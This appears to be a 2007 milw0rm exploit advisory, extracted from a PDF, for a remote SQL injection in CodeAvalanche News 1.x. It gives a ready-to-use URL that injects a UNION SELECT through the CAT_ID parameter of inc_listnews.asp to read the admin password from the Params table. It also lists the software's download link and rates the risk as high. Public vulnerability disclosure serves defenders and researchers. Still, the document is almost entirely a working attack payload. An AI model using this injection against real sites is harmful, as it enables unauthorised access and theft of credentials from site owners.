CodeAvalanche News 1.x CAT_ID Remote SQL Injection Vulnerability.pdf

1 #CodeAvalanche News SQL Injection# 2 3 Software: CodeAvalanche News 4 5 Download: http://www.aspindir.com/indir.asp?id=3315 6 7 Risk: High 8 9 Found by: beks 10 11 http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params 12 13 # milw0rm.com [2007−02−15] Page 1/1 CodeAvalanche News 1.x CAT_ID Remote SQL Injection Vulnerability beks 02/15/2007